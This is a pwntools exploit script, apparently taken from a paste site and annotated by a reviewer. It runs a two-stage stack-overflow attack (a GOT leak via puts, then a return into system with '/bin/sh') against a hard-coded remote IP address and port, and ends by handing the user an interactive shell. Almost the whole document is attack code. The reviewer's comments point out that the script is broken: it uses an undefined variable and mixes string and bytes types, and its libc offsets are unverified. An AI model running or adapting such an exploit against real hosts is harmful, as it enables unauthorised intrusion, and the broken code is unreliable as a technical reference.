- # Pastebin-rendered pwntools script: two-stage stack-overflow exploit against a
- # hard-coded remote service. Stage 1 leaks a GOT entry, stage 2 reuses the leak.
- # NOTE(review): the script as pasted cannot run to completion — see the log line
- # below, which references an undefined name.
- from pwn import *
- import time
- # Hard-coded target host/port; fixed sleep()s stand in for proper prompt syncing,
- # so timing is fragile (a slow service makes recv() return partial data).
- r=remote("212.237.56.32",33334)
- time.sleep(1)
- r.recv()
- # Constants below are the author's annotations; none can be verified from here.
- # The three p32() words after 112 bytes of padding read like a ret2plt chain:
- # call (presumably puts@plt) with the GOT slot as argument, then return to
- # 0x08048470 for a second round. Where exactly the 112 bytes land is assumed
- # to be a saved return address — not confirmable from this page.
- #0x08048430 <---- Return to puts
- #0x08048470 <---- return point
- #0x0804A014 <---- signal@got
- # NOTE(review): "a"*112 is str while p32() returns bytes; under Python 3 this
- # concatenation raises TypeError, so this was presumably written for Python 2.
- r.sendline("a"*112+p32(0x08048430)+p32(0x08048470)+p32(0x0804A014))
- time.sleep(1)
- # Read exactly 4 bytes and decode them as a little-endian 32-bit value; the
- # name suggests this is the resolved address of signal() in the remote libc.
- # Shadows the stdlib `signal` module name if pwn's star-import brings it in.
- signal=u32(r.recv(4))
- # Fixed offsets from the leaked value; these are specific to one libc build and
- # are copied from the paste as-is (no way to confirm them here).
- system=signal+ 0xef80
- binsh=signal+ 0x12fbeb
- # BUG: `address` is never assigned anywhere in this script, so this line raises
- # NameError and execution stops before the second payload is sent.
- log.success("SSIGNAL LEAKED: "+hex(address))
- # Stage 2 uses the same 112-byte padding layout, then the two computed values
- # with 0x08048470 as the return slot between them.
- r.sendline("a"*112+p32(system)+p32(0x08048470)+p32(binsh))
- # Hand the socket over to the user.
- r.interactive()